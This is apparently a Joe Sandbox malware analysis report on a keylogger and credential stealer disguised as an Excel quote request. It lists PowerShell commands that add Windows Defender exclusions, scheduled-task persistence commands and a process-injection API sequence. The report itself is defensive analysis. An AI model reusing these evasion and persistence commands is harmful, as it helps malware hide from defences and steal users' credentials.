                                                                      Commandline:"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                                                                      Imagebase:0xff0000
                                                                      File size:686'592 bytes
                                                                      MD5 hash:2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                                                                      Imagebase:0x790000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
                                                                      Imagebase:0x790000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"
                                                                      Imagebase:0xce0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:08:52:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:08:52:20
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                                                                      Imagebase:0x970000
                                                                      File size:686'592 bytes
                                                                      MD5 hash:2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:08:52:21
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      Imagebase:0x800000
                                                                      File size:686'592 bytes
                                                                      MD5 hash:2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 53%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:08:52:22
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff7fb730000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:08:52:24
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"
                                                                      Imagebase:0xce0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:08:52:24
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:08:52:24
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
                                                                      Imagebase:0xab0000
                                                                      File size:686'592 bytes
                                                                      MD5 hash:2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:10.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:2.6%
                                                                        Total number of Nodes:229
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph 21657 7dc644f 21662 7dc8bc8 21657->21662 21681 7dc8c26 21657->21681 21701 7dc8bb9 21657->21701 21658 7dc6468 21663 7dc8be2 21662->21663 21720 7dc92dd 21663->21720 21724 7dc8fa3 21663->21724 21729 7dc9326 21663->21729 21733 7dc964b 21663->21733 21737 7dc922a 21663->21737 21741 7dc93a9 21663->21741 21747 7dc96cf 21663->21747 21751 7dc988f 21663->21751 21755 7dc91cd 21663->21755 21761 7dc9052 21663->21761 21767 7dc96f1 21663->21767 21771 7dc8ed0 21663->21771 21777 7dc937a 21663->21777 21782 7dc9339 21663->21782 21787 7dc95de 21663->21787 21792 7dc947d 21663->21792 21664 7dc8c06 21664->21658 21682 7dc8bb4 21681->21682 21684 7dc8c29 21681->21684 21685 7dc92dd 2 API calls 21682->21685 21686 7dc947d 2 API calls 21682->21686 21687 7dc95de 2 API calls 21682->21687 21688 7dc9339 2 API calls 21682->21688 21689 7dc937a 2 API calls 21682->21689 21690 7dc8ed0 2 API calls 21682->21690 21691 7dc96f1 2 API calls 21682->21691 21692 7dc9052 2 API calls 21682->21692 21693 7dc91cd 4 API calls 21682->21693 21694 7dc988f 2 API calls 21682->21694 21695 7dc96cf 2 API calls 21682->21695 21696 7dc93a9 2 API calls 21682->21696 21697 7dc922a 2 API calls 21682->21697 21698 7dc964b 2 API calls 21682->21698 21699 7dc9326 2 API calls 21682->21699 21700 7dc8fa3 2 API calls 21682->21700 21683 7dc8c06 21683->21658 21684->21658 21685->21683 21686->21683 21687->21683 21688->21683 21689->21683 21690->21683 21691->21683 21692->21683 21693->21683 21694->21683 21695->21683 21696->21683 21697->21683 21698->21683 21699->21683 21700->21683 21702 7dc8be2 21701->21702 21704 7dc92dd 2 API calls 21702->21704 21705 7dc947d 2 API calls 21702->21705 21706 7dc95de 2 API calls 21702->21706 21707 7dc9339 2 API calls 21702->21707 21708 7dc937a 2 API calls 21702->21708 21709 7dc8ed0 2 API calls 21702->21709 21710 7dc96f1 2 API calls 21702->21710 21711 7dc9052 2 API calls 21702->21711 21712 7dc91cd 4 API calls 21702->21712 21713 7dc988f 2 API calls 21702->21713 21714 7dc96cf 2 API calls 21702->21714 21715 7dc93a9 2 API calls 21702->21715 21716 7dc922a 2 API calls 21702->21716 21717 7dc964b 2 API calls 21702->21717 21718 7dc9326 2 API calls 21702->21718 21719 7dc8fa3 2 API calls 21702->21719 21703 7dc8c06 21703->21658 21704->21703 21705->21703 21706->21703 21707->21703 21708->21703 21709->21703 21710->21703 21711->21703 21712->21703 21713->21703 21714->21703 21715->21703 21716->21703 21717->21703 21718->21703 21719->21703 21797 7dc5a98 21720->21797 21801 7dc5a90 21720->21801 21721 7dc9299 21721->21664 21725 7dc8fac 21724->21725 21805 7dc5c30 21725->21805 21809 7dc5c24 21725->21809 21730 7dc9333 21729->21730 21813 7dc5328 21730->21813 21817 7dc5320 21730->21817 21734 7dc9672 21733->21734 21735 7dc5328 ResumeThread 21734->21735 21736 7dc5320 ResumeThread 21734->21736 21735->21734 21736->21734 21738 7dc9249 21737->21738 21739 7dc5328 ResumeThread 21738->21739 21740 7dc5320 ResumeThread 21738->21740 21739->21738 21740->21738 21742 7dc95f5 21741->21742 21743 7dc9754 21742->21743 21821 7dc59a8 21742->21821 21825 7dc59a0 21742->21825 21743->21664 21744 7dc9616 21748 7dc9673 21747->21748 21748->21747 21749 7dc5328 ResumeThread 21748->21749 21750 7dc5320 ResumeThread 21748->21750 21749->21748 21750->21748 21829 7dc53d8 21751->21829 21833 7dc53d0 21751->21833 21752 7dc98a9 21757 7dc53d8 Wow64SetThreadContext 21755->21757 21758 7dc53d0 Wow64SetThreadContext 21755->21758 21756 7dc91e7 21759 7dc5328 ResumeThread 21756->21759 21760 7dc5320 ResumeThread 21756->21760 21757->21756 21758->21756 21759->21756 21760->21756 21763 7dc8fac 21761->21763 21762 7dc8fd6 21762->21664 21763->21762 21765 7dc5c24 CreateProcessA 21763->21765 21766 7dc5c30 CreateProcessA 21763->21766 21764 7dc9116 21764->21664 21765->21764 21766->21764 21769 7dc59a8 WriteProcessMemory 21767->21769 21770 7dc59a0 WriteProcessMemory 21767->21770 21768 7dc9715 21768->21664 21769->21768 21770->21768 21773 7dc8f13 21771->21773 21772 7dc8fd6 21772->21664 21773->21772 21775 7dc5c24 CreateProcessA 21773->21775 21776 7dc5c30 CreateProcessA 21773->21776 21774 7dc9116 21774->21664 21775->21774 21776->21774 21778 7dc938a 21777->21778 21780 7dc59a8 WriteProcessMemory 21778->21780 21781 7dc59a0 WriteProcessMemory 21778->21781 21779 7dc9443 21779->21664 21780->21779 21781->21779 21783 7dc934b 21782->21783 21837 7dc58e8 21783->21837 21841 7dc58e0 21783->21841 21784 7dc9a8b 21788 7dc95e4 21787->21788 21790 7dc59a8 WriteProcessMemory 21788->21790 21791 7dc59a0 WriteProcessMemory 21788->21791 21789 7dc9616 21790->21789 21791->21789 21793 7dc9379 21792->21793 21794 7dc9443 21792->21794 21795 7dc59a8 WriteProcessMemory 21793->21795 21796 7dc59a0 WriteProcessMemory 21793->21796 21794->21664 21795->21794 21796->21794 21798 7dc5ae3 ReadProcessMemory 21797->21798 21800 7dc5b27 21798->21800 21800->21721 21802 7dc5ae3 ReadProcessMemory 21801->21802 21804 7dc5b27 21802->21804 21804->21721 21806 7dc5cb9 CreateProcessA 21805->21806 21808 7dc5e7b 21806->21808 21808->21808 21810 7dc5c30 CreateProcessA 21809->21810 21812 7dc5e7b 21810->21812 21814 7dc5368 ResumeThread 21813->21814 21816 7dc5399 21814->21816 21816->21730 21818 7dc5328 ResumeThread 21817->21818 21820 7dc5399 21818->21820 21820->21730 21822 7dc59f0 WriteProcessMemory 21821->21822 21824 7dc5a47 21822->21824 21824->21744 21826 7dc59a8 WriteProcessMemory 21825->21826 21828 7dc5a47 21826->21828 21828->21744 21830 7dc541d Wow64SetThreadContext 21829->21830 21832 7dc5465 21830->21832 21832->21752 21834 7dc53d8 Wow64SetThreadContext 21833->21834 21836 7dc5465 21834->21836 21836->21752 21838 7dc5928 VirtualAllocEx 21837->21838 21840 7dc5965 21838->21840 21840->21784 21842 7dc58e8 VirtualAllocEx 21841->21842 21844 7dc5965 21842->21844 21844->21784 21845 7dc9df8 21846 7dc9f83 21845->21846 21847 7dc9e1e 21845->21847 21847->21846 21849 7dc6f84 21847->21849 21850 7dca078 PostMessageW 21849->21850 21851 7dca0e4 21850->21851 21851->21847 21852 31d4668 21853 31d467a 21852->21853 21854 31d4686 21853->21854 21858 31d4778 21853->21858 21863 31d3e28 21854->21863 21856 31d46a5 21859 31d479d 21858->21859 21867 31d4878 21859->21867 21871 31d4888 21859->21871 21864 31d3e33 21863->21864 21879 31d5c44 21864->21879 21866 31d6ff0 21866->21856 21869 31d48af 21867->21869 21868 31d498c 21868->21868 21869->21868 21875 31d44b0 21869->21875 21872 31d48af 21871->21872 21873 31d44b0 CreateActCtxA 21872->21873 21874 31d498c 21872->21874 21873->21874 21876 31d5918 CreateActCtxA 21875->21876 21878 31d59db 21876->21878 21880 31d5c4f 21879->21880 21883 31d5c64 21880->21883 21882 31d7095 21882->21866 21884 31d5c6f 21883->21884 21887 31d5c94 21884->21887 21886 31d717a 21886->21882 21888 31d5c9f 21887->21888 21891 31d5cc4 21888->21891 21890 31d726d 21890->21886 21892 31d5ccf 21891->21892 21894 31d856b 21892->21894 21898 31dac18 21892->21898 21893 31d85a9 21893->21890 21894->21893 21902 31dcd08 21894->21902 21908 31dcd18 21894->21908 21913 31dac3f 21898->21913 21917 31dac50 21898->21917 21899 31dac2e 21899->21894 21903 31dcd16 21902->21903 21904 31dcd00 21902->21904 21905 31dcd5d 21903->21905 21925 31dcec8 21903->21925 21929 31dcf47 21903->21929 21904->21893 21905->21893 21909 31dcd39 21908->21909 21910 31dcd5d 21909->21910 21911 31dcec8 GetModuleHandleW 21909->21911 21912 31dcf47 GetModuleHandleW 21909->21912 21910->21893 21911->21910 21912->21910 21914 31dac50 21913->21914 21920 31dad48 21914->21920 21915 31dac5f 21915->21899 21919 31dad48 GetModuleHandleW 21917->21919 21918 31dac5f 21918->21899 21919->21918 21921 31dad7c 21920->21921 21922 31dad59 21920->21922 21921->21915 21922->21921 21923 31daf80 GetModuleHandleW 21922->21923 21924 31dafad 21923->21924 21924->21915 21926 31dced5 21925->21926 21927 31dcf0f 21926->21927 21934 31dba80 21926->21934 21927->21905 21930 31dcf55 21929->21930 21931 31dcee0 21929->21931 21930->21905 21932 31dcf0f 21931->21932 21933 31dba80 GetModuleHandleW 21931->21933 21932->21905 21933->21932 21935 31dba8b 21934->21935 21936 31ddc28 21935->21936 21938 31dd27c 21935->21938 21939 31dd287 21938->21939 21940 31d5cc4 GetModuleHandleW 21939->21940 21941 31ddc97 21940->21941 21941->21936 21942 31dcfe0 21943 31dd026 21942->21943 21947 31dd5b9 21943->21947 21950 31dd5c8 21943->21950 21944 31dd113 21953 31dd21c 21947->21953 21951 31dd21c DuplicateHandle 21950->21951 21952 31dd5f6 21950->21952 21951->21952 21952->21944 21954 31dd630 DuplicateHandle 21953->21954 21955 31dd5f6 21954->21955 21955->21944
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c10a4ec83addee29682521effdaa925960975c88129dc14a65c15e0383dc9b75
                                                                        • Instruction ID: 767b81bf6f32efc75443f21a8238bbbd1defecea52336b8d2f2cc7d54e4ebc75
                                                                        • Opcode Fuzzy Hash: c10a4ec83addee29682521effdaa925960975c88129dc14a65c15e0383dc9b75
                                                                        • Instruction Fuzzy Hash: 94C1A9B570070A9FDB29DB75C460BAAF7FAAFCA700F14846DD1468B690DB35E802CB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c57f5ddd890efa55fd185972458acf17837bf6f12ee60901ef7af5304bed8de9
                                                                        • Instruction ID: 5311b6d7aba66daf1e25f5874baf269f4bb8ebb27a6147ca79b302d13bc9a7df
                                                                        • Opcode Fuzzy Hash: c57f5ddd890efa55fd185972458acf17837bf6f12ee60901ef7af5304bed8de9
                                                                        • Instruction Fuzzy Hash: 44911DB1D1522ACFDB24CF66C8407E9F7B5BF8A300F1091EAD549A7240DB749A85CF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1cba531a16d60f980ea93f3c6f0c7d5e482b711700c2299a4e34ffbeb252dac1
                                                                        • Instruction ID: 7b9c2bf9d588bbf870571011ba9cbcb4c75b7c8af35e6300b22d06f15ad81f31
                                                                        • Opcode Fuzzy Hash: 1cba531a16d60f980ea93f3c6f0c7d5e482b711700c2299a4e34ffbeb252dac1
                                                                        • Instruction Fuzzy Hash: 7F41D3B4D19209DBDB04CFAAD5443EDFBFAAB8A300F14E469D049A3251DB34D945CF15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d2be07f38dc84a10440131068a4a958a5117e2a1976ec80bae86e448ffa7f2f
                                                                        • Instruction ID: 8db325a93188f05080121e181e4c0258beb34cb7b03d7df394ed93b5176869cb
                                                                        • Opcode Fuzzy Hash: 4d2be07f38dc84a10440131068a4a958a5117e2a1976ec80bae86e448ffa7f2f
                                                                        • Instruction Fuzzy Hash: 8C4102B0D09219CBDB18CFA6C9447EEFBBABF8A301F10D069D419AB254DB349985CF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81169d56bcb870ea126440730185fb6e86d3bfa138fc59cba05db9d6ec9ee1eb
                                                                        • Instruction ID: 4a41da246b537e63cfaa855231a24f09b90864d3c70e6396aaddefa6e2a2cf92
                                                                        • Opcode Fuzzy Hash: 81169d56bcb870ea126440730185fb6e86d3bfa138fc59cba05db9d6ec9ee1eb
                                                                        • Instruction Fuzzy Hash: 304105B0D09259CFDB09CFA6C8553EEBBF6AF8A301F14C06AD049AB255DB380945CF50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 397 7dc5c24-7dc5cc5 400 7dc5cfe-7dc5d1e 397->400 401 7dc5cc7-7dc5cd1 397->401 408 7dc5d57-7dc5d86 400->408 409 7dc5d20-7dc5d2a 400->409 401->400 402 7dc5cd3-7dc5cd5 401->402 403 7dc5cf8-7dc5cfb 402->403 404 7dc5cd7-7dc5ce1 402->404 403->400 406 7dc5ce5-7dc5cf4 404->406 407 7dc5ce3 404->407 406->406 410 7dc5cf6 406->410 407->406 415 7dc5dbf-7dc5e79 CreateProcessA 408->415 416 7dc5d88-7dc5d92 408->416 409->408 411 7dc5d2c-7dc5d2e 409->411 410->403 413 7dc5d30-7dc5d3a 411->413 414 7dc5d51-7dc5d54 411->414 417 7dc5d3c 413->417 418 7dc5d3e-7dc5d4d 413->418 414->408 429 7dc5e7b-7dc5e81 415->429 430 7dc5e82-7dc5f08 415->430 416->415 419 7dc5d94-7dc5d96 416->419 417->418 418->418 420 7dc5d4f 418->420 421 7dc5d98-7dc5da2 419->421 422 7dc5db9-7dc5dbc 419->422 420->414 424 7dc5da4 421->424 425 7dc5da6-7dc5db5 421->425 422->415 424->425 425->425 426 7dc5db7 425->426 426->422 429->430 440 7dc5f18-7dc5f1c 430->440 441 7dc5f0a-7dc5f0e 430->441 443 7dc5f2c-7dc5f30 440->443 444 7dc5f1e-7dc5f22 440->444 441->440 442 7dc5f10 441->442 442->440 445 7dc5f40-7dc5f44 443->445 446 7dc5f32-7dc5f36 443->446 444->443 447 7dc5f24 444->447 449 7dc5f56-7dc5f5d 445->449 450 7dc5f46-7dc5f4c 445->450 446->445 448 7dc5f38 446->448 447->443 448->445 451 7dc5f5f-7dc5f6e 449->451 452 7dc5f74 449->452 450->449 451->452 454 7dc5f75 452->454 454->454
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DC5E66
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: a2f288569f8d6ae3523ab07618621e7b9f07e8dc26bad5d56c6f8e5c0503d8e7
                                                                        • Instruction ID: 86850ca1aeb7e1f6c27b5ed7d53be88aed8289469ed7469b15c27c82ee30df3a
                                                                        • Opcode Fuzzy Hash: a2f288569f8d6ae3523ab07618621e7b9f07e8dc26bad5d56c6f8e5c0503d8e7
                                                                        • Instruction Fuzzy Hash: F5A15AB1D0031ADFEB14CF68D840BDDFBB2AB48310F248169E819A7244DB749991CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 455 7dc5c30-7dc5cc5 457 7dc5cfe-7dc5d1e 455->457 458 7dc5cc7-7dc5cd1 455->458 465 7dc5d57-7dc5d86 457->465 466 7dc5d20-7dc5d2a 457->466 458->457 459 7dc5cd3-7dc5cd5 458->459 460 7dc5cf8-7dc5cfb 459->460 461 7dc5cd7-7dc5ce1 459->461 460->457 463 7dc5ce5-7dc5cf4 461->463 464 7dc5ce3 461->464 463->463 467 7dc5cf6 463->467 464->463 472 7dc5dbf-7dc5e79 CreateProcessA 465->472 473 7dc5d88-7dc5d92 465->473 466->465 468 7dc5d2c-7dc5d2e 466->468 467->460 470 7dc5d30-7dc5d3a 468->470 471 7dc5d51-7dc5d54 468->471 474 7dc5d3c 470->474 475 7dc5d3e-7dc5d4d 470->475 471->465 486 7dc5e7b-7dc5e81 472->486 487 7dc5e82-7dc5f08 472->487 473->472 476 7dc5d94-7dc5d96 473->476 474->475 475->475 477 7dc5d4f 475->477 478 7dc5d98-7dc5da2 476->478 479 7dc5db9-7dc5dbc 476->479 477->471 481 7dc5da4 478->481 482 7dc5da6-7dc5db5 478->482 479->472 481->482 482->482 483 7dc5db7 482->483 483->479 486->487 497 7dc5f18-7dc5f1c 487->497 498 7dc5f0a-7dc5f0e 487->498 500 7dc5f2c-7dc5f30 497->500 501 7dc5f1e-7dc5f22 497->501 498->497 499 7dc5f10 498->499 499->497 502 7dc5f40-7dc5f44 500->502 503 7dc5f32-7dc5f36 500->503 501->500 504 7dc5f24 501->504 506 7dc5f56-7dc5f5d 502->506 507 7dc5f46-7dc5f4c 502->507 503->502 505 7dc5f38 503->505 504->500 505->502 508 7dc5f5f-7dc5f6e 506->508 509 7dc5f74 506->509 507->506 508->509 511 7dc5f75 509->511 511->511
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DC5E66
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: f5c1bb1050ecaf77ac157f17be1157d453cc4df26867eeae1d31b43a5e1a1c0e
                                                                        • Instruction ID: 4c6b7c068d5422de51792e3cbc57c638097e2de8013f5af7d3b699ca0a37358c
                                                                        • Opcode Fuzzy Hash: f5c1bb1050ecaf77ac157f17be1157d453cc4df26867eeae1d31b43a5e1a1c0e
                                                                        • Instruction Fuzzy Hash: D9914CB1D0031ADFEB24CF68D840BEDFBB6BB48314F148169E819A7244DB749995CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
